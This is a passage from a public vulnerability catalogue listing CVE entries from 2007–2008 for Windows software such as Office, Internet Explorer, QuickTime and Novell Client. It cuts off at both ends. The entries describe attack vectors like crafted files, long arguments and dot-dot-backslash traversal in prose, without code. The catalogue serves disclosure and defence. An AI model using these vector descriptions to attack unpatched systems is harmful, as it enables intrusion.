on Windows allow user-assisted remote attackers to execute arbitrary code via a crafted .FLA file. [CVE-2008-1200] Unspecified vulnerability in Microsoft Access allows remote user-assisted attackers to execute arbitrary code via a crafted .MDB file, possibly related to Jet Engine (msjet40.dll). NOTE: this is probably a different issue than CVE-2007-6026. [CVE-2008-1118] Timbuktu Pro 8.6.5 for Windows, and possibly 8.7 for Mac OS X, does not perform input validation before logging information fields taken from packets from a remote peer, which allows remote attackers to generate crafted log entries, and possibly avoid detection of attacks, via modified (1) computer name, (2) user name, and (3) IP address fields. [CVE-2008-1117] Directory traversal vulnerability in the Notes (aka Flash Notes or instant messages) feature in tb2ftp.dll in Timbuktu Pro 8.6.5 for Windows, and possibly 8.7 for Mac OS X, allows remote attackers to upload files to arbitrary locations via a destination filename with a \ (backslash) character followed by ../ (dot dot slash) sequences. NOTE: this can be leveraged for code execution by writing to a Startup folder. NOTE: this issue reportedly exists because of an incomplete fix for CVE-2007-4220. [CVE-2008-1092] Buffer overflow in msjet40.dll before 4.0.9505.0 in Microsoft Jet Database Engine allows remote attackers to execute arbitrary code via a crafted Word file, as exploited in the wild in March 2008. NOTE: as of 20080513, Microsoft has stated that this is the same issue as CVE-2007-6026. [CVE-2008-1091] Unspecified vulnerability in Microsoft Word in Office 2000 and XP SP3, 2003 SP2 and SP3, and 2007 Office System SP1 and earlier allows remote attackers to execute arbitrary code via a Rich Text Format (.rtf) file with a malformed string that triggers a "memory calculation error" and a heap-based buffer overflow, aka "Object Parsing Vulnerability." [CVE-2008-1090] Unspecified vulnerability in Microsoft Visio 2002 SP2, 2003 SP2 and SP3, and 2007 up to SP1 allows user-assisted remote attackers to execute arbitrary code via a crafted .DXF file, aka "Visio Memory Validation Vulnerability." [CVE-2008-1089] Unspecified vulnerability in Microsoft Visio 2002 SP2, 2003 SP2 and SP3, and 2007 up to SP1 allows user-assisted remote attackers to execute arbitrary code via a Visio file containing crafted object header data, aka "Visio Object Header Vulnerability." [CVE-2008-1088] Microsoft Project 2000 Service Release 1, 2002 SP1, and 2003 SP2 allows user-assisted remote attackers to execute arbitrary code via a crafted Project file, related to improper validation of "memory resource allocations." [CVE-2008-1085] Use-after-free vulnerability in Microsoft Internet Explorer 5.01 SP4, 6 through SP1, and 7 allows remote attackers to execute arbitrary code via a crafted data stream that triggers memory corruption, as demonstrated using an invalid MIME-type that does not have a registered handler. [CVE-2008-1024] Apple Safari before 3.1.1, when running on Windows XP or Vista, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a file download with a crafted file name, which triggers memory corruption. [CVE-2008-1023] Heap-based buffer overflow in Clip opcode parsing in Apple QuickTime before 7.4.5 on Windows allows remote attackers to execute arbitrary code via a crafted PICT image file. [CVE-2008-1021] Heap-based buffer overflow in Animation codec content handling in Apple QuickTime before 7.4.5 on Windows allows remote attackers to execute arbitrary code via a crafted movie with run length encoding. [CVE-2008-1020] Heap-based buffer overflow in quickTime.qts in Apple QuickTime before 7.4.5 on Windows allows remote attackers to execute arbitrary code via a crafted PICT image file with Kodak encoding, related to error checking and error messages. [CVE-2008-1001] Cross-site scripting (XSS) vulnerability in Apple Safari before 3.1, when running on Windows XP or Vista, allows remote attackers to inject arbitrary web script or HTML via a crafted URL that is not properly handled in the error page. [CVE-2008-0768] Multiple stack-based and heap-based buffer overflows in the Windows RPC components for IBM Informix Storage Manager (ISM), as used in Informix Dynamic Server (IDS) 10.00.xC8 and earlier and 11.10.xC2 and earlier, allow attackers to execute arbitrary code via crafted XDR requests. [CVE-2008-0766] Stack-based buffer overflow in RpmSrvc.exe in Brooks Remote Print Manager (RPM) 4.5.1.11 and earlier (Elite and Select) for Windows allows remote attackers to execute arbitrary code via a long filename in a "Receive data file" LPD command. NOTE: some of these details are obtained from third party information. [CVE-2008-0764] Format string vulnerability in the logging function in Larson Network Print Server (LstNPS) 9.4.2 build 105 and earlier for Windows might allow remote attackers to execute arbitrary code via format string specifiers in a USEP command on TCP port 3114. [CVE-2008-0663] Novell Challenge Response Client (LCM) 2.7.5 and earlier, as used with Novell Client for Windows 4.91 SP4, allows users with physical access to a locked system to obtain contents of the clipboard by pasting the contents into the Challenge Question field. [CVE-2008-0662] The Auto Local Logon feature in Check Point VPN-1 SecuRemote/SecureClient NGX R60 and R56 for Windows caches credentials under the Checkpoint\SecuRemote registry key, which has Everyone/Full Control permissions, which allows local users to gain privileges by reading and reusing the credentials. [CVE-2008-0639] Stack-based buffer overflow in the EnumPrinters function in the Spooler service (nwspool.dll) in Novell Client 4.91 SP2, SP3, and SP4 for Windows allows remote attackers to execute arbitrary code via a crafted RPC request, aka Novell bug 353138, a different vulnerability than CVE-2006-5854. NOTE: this issue exists because of an incomplete fix for CVE-2007-6701. [CVE-2008-0583] Cross-zone scripting vulnerability in the Internet Explorer web control in Skype 3.6.0.244, and earlier 3.5.x and 3.6.x versions, on Windows allows user-assisted remote attackers to inject arbitrary web script or HTML in the Local Machine Zone via the Description and unspecified other metadata fields of a Metacafe movie submitted by Metacafe Pro to the Skype video gallery, accessible through a search within the (1) "Add video to chat" or (2) "Add video to mood" dialog, a different vector than CVE-2008-0454. [CVE-2008-0582] Cross-zone scripting vulnerability in the Internet Explorer web control in Skype 3.1 through 3.6.0.244 on Windows allows remote attackers to inject arbitrary web script or HTML in the Local Machine Zone via the Full Name field of a reviewer of a business item entry, accessible through (1) the SkypeFind dialog and (2) a skype:?skypefind URI for the skype: URI handler. [CVE-2008-0533] Multiple cross-site scripting (XSS) vulnerabilities in securecgi-bin/CSuserCGI.exe in User-Changeable Password (UCP) before 4.2 in Cisco Secure Access Control Server (ACS) for Windows and ACS Solution Engine allow remote attackers to inject arbitrary web script or HTML via an argument located immediately after the Help argument, and possibly unspecified other vectors. [CVE-2008-0532] Multiple buffer overflows in securecgi-bin/CSuserCGI.exe in User-Changeable Password (UCP) before 4.2 in Cisco Secure Access Control Server (ACS) for Windows and ACS Solution Engine allow remote attackers to execute arbitrary code via a long argument located immediately after the Logout argument, and possibly unspecified other vectors. [CVE-2008-0454] Cross-zone scripting vulnerability in the Internet Explorer web control in Skype 3.6.0.244, and earlier 3.5.x and 3.6.x versions, on Windows allows user-assisted remote attackers to inject arbitrary web script or HTML in the Local Machine Zone via the Title field of a (1) Dailymotion and possibly (2) Metacafe movie in the Skype video gallery, accessible through a search within the "Add video to chat" dialog, aka "videomood XSS." [CVE-2008-0392] Multiple buffer overflows in Microsoft Visual Basic Enterprise Edition 6.0 SP6 allow user-assisted remote attackers to execute arbitrary code via a .dsr file with a long (1) ConnectionName or (2) CommandName line. [CVE-2008-0296] Heap-based buffer overflow in the libaccess_realrtsp plugin in VideoLAN VLC Media Player 0.8.6d and earlier on Windows might allow remote RTSP servers to cause a denial of service (application crash) or execute arbitrary code via a long string. [CVE-2008-0250] Buffer overflow in Microsoft Visual InterDev 6.0 (SP6) allows user-assisted attackers to execute arbitrary code via a Studio Solution (.SLN) file with a long Project line. [CVE-2008-0237] The Microsoft Rich Textbox ActiveX Control (RICHTX32.OCX) 6.1.97.82 allows remote attackers to execute arbitrary commands by invoking the insecure SaveFile method. [CVE-2008-0236] An ActiveX control for Microsoft Visual FoxPro (vfp6r.dll 6.0.8862.0) allows remote attackers to execute arbitrary commands by invoking the DoCmd method. [CVE-2008-0235] The Microsoft VFP_OLE_Server ActiveX control allows remote attackers to execute arbitrary code by invoking the foxcommand method. [CVE-2008-0121] A "memory calculation error" in Microsoft PowerPoint Viewer 2003 allows remote attackers to execute arbitrary code via a PowerPoint file with an invalid picture index that triggers memory corruption, aka "Memory Calculation Vulnerability." [CVE-2008-0120] Integer overflow in Microsoft PowerPoint Viewer 2003 allows remote attackers to execute arbitrary code via a PowerPoint file with a malformed picture index that triggers memory corruption, related to handling of CString objects, aka "Memory Allocation Vulnerability." [CVE-2008-0119] Unspecified vulnerability in Microsoft Publisher in Office 2000 and XP SP3, 2003 SP2 and SP3, and 2007 SP1 and earlier allows remote attackers to execute arbitrary code via a Publisher file with crafted object header data that triggers memory corruption, aka "Publisher Object Handler Validation Vulnerability." [CVE-2008-0118] Unspecified vulnerability in Microsoft Office 2000 SP3, XP SP3, 2003 SP2, Excel Viewer 2003 up to SP3, and Office 2004 for Mac allows user-assisted remote attackers to execute arbitrary code via a crafted Office document that triggers memory corruption from an "allocation error," aka "Microsoft Office Memory Corruption Vulnerability." [CVE-2008-0117] Unspecified vulnerability in Microsoft Excel 2000 SP3 and 2002 SP2, and Office 2004 and 2008 for Mac, allows user-assisted remote attackers to execute arbitrary code via crafted conditional formatting values, aka "Excel Conditional Formatting Vulnerability." [CVE-2008-0116] Microsoft Excel 2000 SP3 through 2003 SP2, Viewer 2003, Compatibility Pack, and Office 2004 and 2008 for Mac allows user-assisted remote attackers to execute arbitrary code via malformed tags in rich text, aka "Excel Rich Text Validation Vulnerability." [CVE-2008-0115] Unspecified vulnerability in Microsoft Excel 2000 SP3 through 2007, Viewer 2003, Compatibility Pack, and Office for Mac 2004 allows user-assisted remote attackers to execute arbitrary code via malformed formulas, aka "Excel Formula Parsing Vulnerability." [CVE-2008-0114] Unspecified vulnerability in Microsoft Excel 2000 SP3 through 2003 SP2, Viewer 2003, and Office for Mac 2004 allows user-assisted remote attackers to execute arbitrary code via crafted Style records that trigger memory corruption. [CVE-2008-0113] Unspecified vulnerability in Microsoft Office Excel Viewer 2003 up to SP3 allows user-assisted remote attackers to execute arbitrary code via an Excel document with malformed cell comments that trigger memory corruption from an "allocation error," aka "Microsoft Office Cell Parsing Memory Corruption Vulnerability." [CVE-2008-0112] Unspecified vulnerability in Microsoft Excel 2000 SP3, and Office for Mac 2004 and 2008 allows user-assisted remote attackers to execute arbitrary code via a crafted .SLK file that is not properly handled when importing the file, aka "Excel File Import Vulnerability." [CVE-2008-0111] Unspecified vulnerability in Microsoft Excel 2000 SP3 through 2007, Viewer 2003, Compatibility Pack, and Office 2004 for Mac allows user-assisted remote attackers to execute arbitrary code via crafted data validation records, aka "Excel Data Validation Record Vulnerability." [CVE-2008-0110] Unspecified vulnerability in Microsoft Outlook in Office 2000 SP3, XP SP3, 2003 SP2 and Sp3, and Office System allows user-assisted remote attackers to execute arbitrary code via a crafted mailto URI. [CVE-2008-0109] Word in Microsoft Office 2000 SP3, XP SP3, Office 2003 SP2, and Office Word Viewer 2003 allows remote attackers to execute arbitrary code via crafted fields within the File Information Block (FIB) of a Word file, which triggers length calculation errors and memory corruption. [CVE-2008-0108] Stack-based buffer overflow in wkcvqd01.dll in Microsoft Works 6 File Converter, as used in Office 2003 SP2 and SP3, Works 8.0, and Works Suite 2005, allows remote attackers to execute arbitrary code via a .wps file with crafted field lengths, aka "Microsoft Works File Converter Field Length Vulnerability." [CVE-2008-0106] Buffer overflow in Microsoft SQL Server 2005 SP1 and SP2, and 2005 Express Edition SP1 and SP2, allows remote authenticated users to execute arbitrary code via a crafted insert statement. [CVE-2008-0105] Microsoft Works 6 File Converter, as used in Office 2003 SP2 and SP3, Works 8.0, and Works Suite 2005, allows remote attackers to execute arbitrary code via a .wps file with crafted section header index table information, aka "Microsoft Works File Converter Index Table Vulnerability." [CVE-2008-0104] Unspecified vulnerability in Microsoft Office Publisher 2000, 2002, and 2003 SP2 allows remote attackers to execute arbitrary code via a crafted .pub file, aka "Publisher Memory Corruption Vulnerability." [CVE-2008-0103] Unspecified vulnerability in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP2, and Office 2004 for Mac allows remote attackers to execute arbitrary code via an Office document that contains a malformed object, related to a "memory handling error," aka "Microsoft Office Execution Jump Vulnerability." [CVE-2008-0102] Unspecified vulnerability in Microsoft Office Publisher 2000, 2002, and 2003 SP2 allows remote attackers to execute arbitrary code via a crafted .pub file, related to invalid "memory values," aka "Publisher Invalid Memory Reference Vulnerability." [CVE-2008-0086] Buffer overflow in the convert function in Microsoft SQL Server 2000 SP4, 2000 Desktop Engine (MSDE 2000) SP4, and 2000 Desktop Engine (WMSDE) allows remote authenticated users to execute arbitrary code via a crafted SQL expression. [CVE-2008-0082] An ActiveX control (Messenger.UIAutomation.1) in Windows Messenger 4.7 and 5.1 is marked as safe-for-scripting, which allows remote attackers to control the Messenger application, and "change state," obtain contact information, and establish audio or video connections without notification via unknown vectors. [CVE-2008-0081] Unspecified vulnerability in Microsoft Excel 2000 SP3 through 2003 SP2, Viewer 2003, and Office 2004 for Mac allows user-assisted remote attackers to execute arbitrary code via crafted macros, aka "Macro Validation Vulnerability," a different vulnerability than CVE-2007-3490. [CVE-2008-0078] Unspecified vulnerability in an ActiveX control (dxtmsft.dll) in Microsoft Internet Explorer 5.01, 6 SP1 and SP2, and 7 allows remote attackers to execute arbitrary code via a crafted image, aka "Argument Handling Memory Corruption Vulnerability." [CVE-2008-0077] Use-after-free vulnerability in Microsoft Internet Explorer 6 SP1, 6 SP2, and and 7 allows remote attackers to execute arbitrary code by assigning malformed values to certain properties, as demonstrated using the by property of an animateMotion SVG element, aka "Property Memory Corruption Vulnerability." [CVE-2008-0076] Unspecified vulnerability in Microsoft Internet Explorer 5.01, 6 SP1 and SP2, and 7 allows remote attackers to execute arbitrary code via crafted HTML layout combinations, aka "HTML Rendering Memory Corruption Vulnerability." [CVE-2008-0075] Unspecified vulnerability in Microsoft Internet Information Services (IIS) 5.1 through 6.0 allows remote attackers to execute arbitrary code via crafted inputs to ASP pages. [CVE-2008-0074] Unspecified vulnerability in Microsoft Internet Information Services (IIS) 5.0 through 7.0 allows local users to gain privileges via unknown vectors related to file change notifications in the TPRoot, NNTPFile\Root, or WWWRoot folders. [CVE-2008-0064] Stack-based buffer overflow in Pierre-emmanuel Gougelet (1) XnView 1.91 and 1.92, (2) NConvert 4.85, and (3) libgfl280.dll in GFL SDK 2.870 for Windows allows user-assisted remote attackers to execute arbitrary code via a crafted Radiance RGBE (.hdr) file. [CVE-2008-0011] Microsoft DirectX 8.1 through 9.0c, and DirectX on Microsoft XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008, does not properly perform MJPEG error checking, which allows remote attackers to execute arbitrary code via a crafted MJPEG stream in a (1) AVI or (2) ASF file, aka the "MJPEG Decoder Vulnerability." [CVE-2007-6724] Vidalia bundle before 0.1.2.18, when running on Windows, installs Privoxy with a configuration file (config.txt or config) that contains an insecure enable-remote-http-toggle setting, which allows remote attackers to bypass intended access restrictions and modify configuration. [CVE-2007-6723] TorK before 0.22, when running on Windows and Mac OS X, installs Privoxy with a configuration file (config.txt or config) that contains insecure (1) enable-remote-toggle and (2) enable-edit-actions settings, which allows remote attackers to bypass intended access restrictions and modify configuration. [CVE-2007-6722] Vidalia bundle before 0.1.2.18, when running on Windows and Mac OS X, installs Privoxy with a configuration file (config.txt or config) that contains insecure (1) enable-remote-toggle and (2) enable-edit-actions settings, which allows remote attackers to bypass intended access restrictions and modify configuration. [CVE-2007-6705] The WebSphere MQ XA 5.3 before FP13 and 6.0.x before 6.0.2.1 client for Windows, when running in an MTS or a COM+ environment, grants the PROCESS_DUP_HANDLE privilege to the Everyone group upon connection to a queue manager, which allows local users to duplicate an arbitrary handle and possibly hijack an arbitrary process. [CVE-2007-6701] Multiple stack-based buffer overflows in the Spooler service (nwspool.dll) in Novell Client 4.91 SP4 for Windows allow remote attackers to execute arbitrary code via long arguments to multiple unspecified RPC functions, aka Novell bug 287919, a different vulnerability than CVE-2007-2954. [CVE-2007-6571] Cross-site scripting (XSS) vulnerability in Sun Java System Web Proxy Server 3.6 before SP11 on Windows allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka BugID 6611356. [CVE-2007-6534] Multiple unspecified vulnerabilities in Microsoft Office Publisher allow user-assisted remote attackers to cause a denial of service (application crash) via a crafted PUB file, possibly involving wordart. [CVE-2007-6514] Apache HTTP Server, when running on Linux with a document root on a Windows share mounted using smbfs, allows remote attackers to obtain unprocessed content such as source files for .php programs via a trailing "\" (backslash), which is not handled by the intended AddType directive. [CVE-2007-6507] SpntSvc.exe daemon in Trend Micro ServerProtect 5.58 for Windows, before Security Patch 4, exposes unspecified dangerous sub-functions from StRpcSrv.dll in the DCE/RPC interface, which allows remote attackers to obtain "full file system access" and execute arbitrary code. [CVE-2007-6471] Incomplete blacklist vulnerability in main.php in phPay 2.02.01 on Windows allows remote attackers to conduct directory traversal attacks and include and execute arbitrary local files via a ..\ (dot dot backslash) in the config parameter. [CVE-2007-6423] * DISPUTED Unspecified vulnerability in mod_proxy_balancer for Apache HTTP Server 2.2.x before 2.2.7-dev, when running on Windows, allows remote attackers to trigger memory corruption via a long URL. NOTE: the vendor could not reproduce this issue. [CVE-2007-6405] Sergey Lyubka Simple HTTPD (shttpd) 1.38 and earlier on Windows allows remote attackers to download arbitrary CGI programs or scripts via a URI with an appended (1) '+' character, (2) '.' character, (3) %2e sequence (hex-encoded dot), or (4) hex-encoded character greater than 0x7f. NOTE: the %20 vector is already covered by CVE-2007-3407. [CVE-2007-6404] Directory traversal vulnerability in Sergey Lyubka Simple HTTPD (shttpd) 1.38 and earlier on Windows allows remote attackers to read arbitrary files via a ..\ (dot dot backslash) in the URI. [CVE-2007-6357] Stack-based buffer overflow in Microsoft Office Access allows remote, user-assisted attackers to execute arbitrary code via a crafted Microsoft Access Database (.mdb) file. NOTE: due to the lack of details as of 20071210, it is not clear whether this issue is the same as CVE-2007-6026 or CVE-2005-0944. [CVE-2007-6349] P4Webs.exe in Perforce P4Web 2006.2 and earlier, when running on Windows, allows remote attackers to cause a denial of service (CPU consumption) via an HTTP request with an empty body and a Content-Length greater than 0. [CVE-2007-6334] Ingres 2.5 and 2.6 on Windows, as used in multiple CA products and possibly other products, assigns the privileges and identity of users to be the same as the first user, which allows remote attackers to gain privileges. [CVE-2007-6331] Absolute path traversal vulnerability in the HPInfoDLL.HPInfo.1 ActiveX control in HPInfoDLL.dll 1.0, as shipped with HP Info Center (hpinfocenter.exe) 1.0.1.1 in HP Quick Launch Button (QLBCTRL.exe, aka QLB) 6.3 and earlier allows remote attackers to execute arbitrary programs via the first argument to the LaunchApp method. NOTE: only a user-assisted attack is possible on Windows Vista. [CVE-2007-6329] Microsoft Office 2007 12.0.6015.5000 and MSO 12.0.6017.5000 do not sign the metadata of Office Open XML (OOXML) documents, which makes it easier for remote attackers to modify Dublin Core metadata fields, as demonstrated by the (1) LastModifiedBy and (2) creator fields in docProps/core.xml in the OOXML ZIP container. [CVE-2007-6326] Sergey Lyubka Simple HTTPD (shttpd) 1.3 on Windows allows remote attackers to cause a denial of service via a request that includes an MS-DOS device name, as demonstrated by the /aux URI. [CVE-2007-6255] Buffer overflow in the Microsoft HeartbeatCtl ActiveX control in HRTBEAT.OCX allows remote attackers to execute arbitrary code via the Host argument to an unspecified method. [CVE-2007-6238] Unspecified vulnerability in Apple QuickTime 7.2 on Windows XP allows remote attackers to execute arbitrary code via unknown attack vectors, probably a different vulnerability than CVE-2007-6166. NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release advisories with actionable information. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine. However, the organization has stated that this is different than CVE-2007-6166. [CVE-2007-6227] QEMU 0.9.0 allows local users of a Windows XP SP2 guest operating system to overwrite the TranslationBlock (code_gen_buffer) buffer, and probably have unspecified other impacts related to an "overflow," via certain Windows executable programs, as demonstrated by qemu-dos.com. [CVE-2007-6166] Stack-based buffer overflow in Apple QuickTime before 7.3.1, as used in QuickTime Player on Windows XP and Safari on Mac OS X, allows remote Real Time Streaming Protocol (RTSP) servers to execute arbitrary code via an RTSP response with a long Content-Type header. [CVE-2007-6146] Hitachi JP1/File Transmission Server/FTP 01-00 through 08-10-02 on Windows might allow remote attackers to cause a denial of service (service stop) via a "specific file" argument to an FTP command. [CVE-2007-6081] AdventNet EventLog Analyzer build 4030 for Windows, and possibly other versions and platforms, installs a mysql instance with a default "root" account without a password, which allows remote attackers to gain privileges and modify logs. [CVE-2007-6026] Stack-based buffer overflow in Microsoft msjet40.dll 4.0.8618.0 (aka Microsoft Jet Engine), as used by Access 2003 in Microsoft Office 2003 SP3, allows user-assisted attackers to execute arbitrary code via a crafted MDB file database file containing a column structure with a modified column count. NOTE: this might be the same issue as CVE-2005-0944. [CVE-2007-6017] The PVATLCalendar.PVCalendar.1 ActiveX control in pvcalendar.ocx in the scheduler component in the Media Server in Symantec Backup Exec for Windows Server (BEWS) 11d 11.0.6235 and 11.0.7170, and 12.0 12.0.1364, exposes the unsafe Save method, which allows remote attackers to cause a denial of service (browser crash), or create or overwrite arbitrary files, via string values of the (1) _DOWText0, (2) _DOWText1, (3) _DOWText2, (4) _DOWText3, (5) _DOWText4, (6) _DOWText5, (7) _DOWText6, (8) _MonthText0, (9) _MonthText1, (10) _MonthText2, (11) _MonthText3, (12) _MonthText4, (13) _MonthText5, (14) _MonthText6, (15) _MonthText7, (16) _MonthText8, (17) _MonthText9, (18) _MonthText10, and (19) _MonthText11 properties. NOTE: the vendor states "Authenticated user involvement required," but authentication is not needed to attack a client machine that loads this control. [CVE-2007-6016] Multiple stack-based buffer overflows in the PVATLCalendar.PVCalendar.1 ActiveX control in pvcalendar.ocx in the scheduler component in the Media Server in Symantec Backup Exec for Windows Server (BEWS) 11d 11.0.6235 and 11.0.7170, and 12.0 12.0.1364, allow remote attackers to execute arbitrary code via a long (1) _DOWText0, (2) _DOWText1, (3) _DOWText2, (4) _DOWText3, (5) _DOWText4, (6) _DOWText5, (7) _DOWText6, (8) _MonthText0, (9) _MonthText1, (10) _MonthText2, (11) _MonthText3, (12) _MonthText4, (13) _MonthText5, (14) _MonthText6, (15) _MonthText7, (16) _MonthText8, (17) _MonthText9, (18) _MonthText10, or (19) _MonthText11 property value when executing the Save method. NOTE: the vendor states "Authenticated user involvement required," but authentication is not needed to attack a client machine that loads this control. [CVE-2007-5957] Unspecified vulnerability in IBM Informix Dynamic Server (IDS) 10.00.TC3TL and 11.10.TB4TL on Windows allows attackers to cause a denial of service (application crash) via unspecified SQ_ONASSIST requests. [CVE-2007-5861] Unspecified vulnerability in Spotlight in Apple Mac OS X 10.4.11 allows user-assisted attackers to cause a denial of service (application termination) or execute arbitrary code via a crafted .XLS file that triggers memory corruption in the Microsoft Office Spotlight Importer. [CVE-2007-5667] NWFILTER.SYS in Novell Client 4.91 SP 1 through SP 4 for Windows 2000, XP, and Server 2003 makes the \.\nwfilter device available for arbitrary user-mode input via METHOD_NEITHER IOCTLs, which allows local users to gain privileges by passing a kernel address as an argument and overwriting kernel memory locations. [CVE-2007-5653] The Component Object Model (COM) functions in PHP 5.x on Windows do not follow safe_mode and disable_functions restrictions, which allows context-dependent attackers to bypass intended limitations, as demonstrated by executing objects with the kill bit set in the corresponding ActiveX control Compatibility Flags, executing programs via a function in compatUI.dll, invoking wscript.shell via wscript.exe, invoking Scripting.FileSystemObject via wshom.ocx, and adding users via a function in shgina.dll, related to the com_load_typelib function. [CVE-2007-5636] Buffer overflow in the Nortel UNIStim IP Softphone 2050 allows remote attackers to cause a denial of service (application abort) and possibly execute arbitrary code via a flood of invalid characters to the RTCP port (5678/udp) that triggers a Windows error message, aka "extraneous messaging." [CVE-2007-5618] Unquoted Windows search path vulnerability in the Authorization and other services in VMware Player 1.0.x before 1.0.5 and 2.0 before 2.0.1, VMware Server before 1.0.4, and Workstation 5.x before 5.5.5 and 6.x before 6.0.1 might allow local users to gain privileges via malicious programs. [CVE-2007-5580] Buffer overflow in a certain driver in Cisco Security Agent 4.5.1 before 4.5.1.672, 5.0 before 5.0.0.225, 5.1 before 5.1.0.106, and 5.2 before 5.2.0.238 on Windows allows remote attackers to execute arbitrary code via a crafted SMB packet in a TCP session on port (1) 139 or (2) 445. [CVE-2007-5493] The SMS handler for Windows Mobile 2005 Pocket PC Phone edition allows attackers to hide the sender field of an SMS message via a malformed WAP PUSH message that causes the PDU to be incorrectly decoded. [CVE-2007-5473] StaticFileHandler.cs in System.Web in Mono before 1.2.5.2, when running on Windows, allows remote attackers to obtain source code of sensitive files via a request containing a trailing (1) space or (2) dot, which is not properly handled by XSP. [CVE-2007-5470] Microsoft Expression Media stores the catalog password in cleartext in the catalog IVC file, which allows local users to obtain sensitive information and gain access to the catalog by reading the IVC file. [CVE-2007-5456] Microsoft Internet Explorer 7 and earlier allows remote attackers to bypass the "File Download - Security Warning" dialog box and download arbitrary .exe files by placing a '?' (question mark) followed by a non-.exe filename after the .exe filename, as demonstrated by (1) .txt, (2) .cda, (3) .log, (4) .dif, (5) .sol, (6) .htt, (7) .itpc, (8) .itms, (9) .dvr-ms, (10) .dib, (11) .asf, (12) .tif, and unspecified other extensions, a different issue than CVE-2004-1331. NOTE: this issue might not cross privilege boundaries, although it does bypass an intended protection mechanism. [CVE-2007-5355] The Web Proxy Auto-Discovery (WPAD) feature in Microsoft Internet Explorer 6 and 7, when a primary DNS suffix with three or more components is configured, resolves an unqualified wpad hostname in a second-level domain outside this configured DNS domain, which allows remote WPAD servers to conduct man-in-the-middle (MITM) attacks. [CVE-2007-5347] Microsoft Internet Explorer 5.01 through 7 allows remote attackers to execute arbitrary code via "unexpected method calls to HTML objects," aka "DHTML Object Memory Corruption Vulnerability." [CVE-2007-5344] Microsoft Internet Explorer 5.01 through 7 allows remote attackers to execute arbitrary code via a crafted website using Javascript that creates, modifies, deletes, and accesses document objects using the tags property, which triggers heap corruption, related to uninitialized or deleted objects, a different issue than CVE-2007-3902 and CVE-2007-3903, and a variant of "Uninitialized Memory Corruption Vulnerability." [CVE-2007-5322] Insecure method vulnerability in the FPOLE.OCX 6.0.8450.0 ActiveX control in Microsoft Visual FoxPro 6.0 allows remote attackers to execute arbitrary programs by specifying them as an argument to the FoxDoCmd function. [CVE-2007-5302] Multiple cross-site scripting (XSS) vulnerabilities in HP System Management Homepage (SMH) in HP-UX B.11.11, B.11.23, and B.11.31, and SMH before 2.1.10 for Linux and Windows, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-5277] Microsoft Internet Explorer 6 drops DNS pins based on failed connections to irrelevant TCP ports, which makes it easier for remote attackers to conduct DNS rebinding attacks, as demonstrated by a port 81 URL in an IMG SRC, when the DNS pin had been established for a session on port 80, a different issue than CVE-2006-4560. [CVE-2007-5250] The Windows dedicated server for the Unreal engine, as used by America's Army and America's Army Special Forces 2.8.2 and earlier, when Punkbuster (PB) is enabled, allows remote attackers to cause a denial of service (server hang) via packets containing 0x07 characters or other unspecified invalid characters. NOTE: this issue may overlap CVE-2007-4443. NOTE: this issue might be in Punkbuster itself, but there are insufficient details to be certain. [CVE-2007-5236] Java Web Start in Sun JDK and JRE 5.0 Update 12 and earlier, and SDK and JRE 1.4.2_15 and earlier, on Windows does not properly enforce access restrictions for untrusted applications, which allows user-assisted remote attackers to read local files via an untrusted application. [CVE-2007-5169] Stack-based buffer overflow in MAIPM6.dll in Adobe PageMaker 7.0.1 and 7.0.2 on Windows allows user-assisted remote attackers to execute arbitrary code via a long font name in a .PMD file. [CVE-2007-5158] The focus handling for the onkeydown event in Microsoft Internet Explorer 6.0 allows remote attackers to change field focus and copy keystrokes via a certain use of a JavaScript htmlFor attribute, as demonstrated by changing focus from a textarea to a file upload field, a related issue to CVE-2007-3511. [CVE-2007-5144] Buffer overflow in the GDI engine in Windows Live Messenger, as used for Windows MSN Live 8.1, allows user-assisted remote attackers to cause a denial of service (application crash or system crash) and possibly execute arbitrary code by placing a malformed file in a new folder under the Sharing Folders path, and triggering a synchronize operation through the Windows MSN Live online service, possibly related to extended file attributes and possibly related to an incomplete fix for MS07-046, as demonstrated by a (1) .jpg, (2) .gif, (3) .wmf, (4) .doc, or (5) .ico file. [CVE-2007-5143] F-Secure Anti-Virus for Windows Servers 7.0 64-bit edition allows local users to bypass virus scanning by using the system32 directory to store a crafted (1) archive or (2) packed executable. NOTE: in many environments, this does not cross privilege boundaries because any process able to write to system32 could also shut off F-Secure Anti-Virus. [CVE-2007-5128] SimpNews 2.41.03 on Windows, when PHP before 5.0.0 is used, allows remote attackers to obtain sensitive information via an certain link_date parameter to events.php, which reveals the path in an error message due to an unsupported argument type for the mktime function on Windows. [CVE-2007-5126] Unspecified vulnerability in the client in Symantec Veritas Backup Exec for Windows Servers 11d has unknown impact and remote attack vectors. NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release actionable advisories. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine. [CVE-2007-5090] Unspecified vulnerability in IBM Rational ClearQuest (CQ), when a Microsoft SQL Server or an IBM DB2 database is used, allows attackers to corrupt data via unspecified vectors. [CVE-2007-5080] Integer overflow in RealNetworks RealPlayer 10 and 10.5, RealOne Player 1, and RealPlayer Enterprise for Windows allows remote attackers to execute arbitrary code via a crafted Lyrics3 2.00 tag in an MP3 file, resulting in a heap-based buffer overflow. [CVE-2007-5066] Unspecified vulnerability in Webmin before 1.370 on Windows allows remote authenticated users to execute arbitrary commands via a crafted URL. [CVE-2007-5023] Unquoted Windows search path vulnerability in EMC VMware Workstation before 5.5.5 Build 56455 and 6.x before 6.0.1 Build 55017, Player before 1.0.5 Build 56455 and Player 2 before 2.0.1 Build 55017, ACE before 1.0.3 Build 54075, and Server before 1.0.4 Build 56528 allows local users to gain privileges via unspecified vectors, possibly involving a malicious "program.exe" file in the C: folder. [CVE-2007-5020] Unspecified vulnerability in Adobe Acrobat and Reader 8.1 on Windows allows remote attackers to execute arbitrary code via a crafted PDF file, related to the mailto: option and Internet Explorer 7 on Windows XP. NOTE: this information is based upon a vague pre-advisory by a reliable researcher. [CVE-2007-4991] The SOCKS4 Proxy in Microsoft Internet Security and Acceleration (ISA) Server 2004 SP1 and SP2 allows remote attackers to obtain potentially sensitive information (the destination IP address of another user's session) via an empty packet. [CVE-2007-4972] RegMon 7.04 does not properly validate certain parameters to 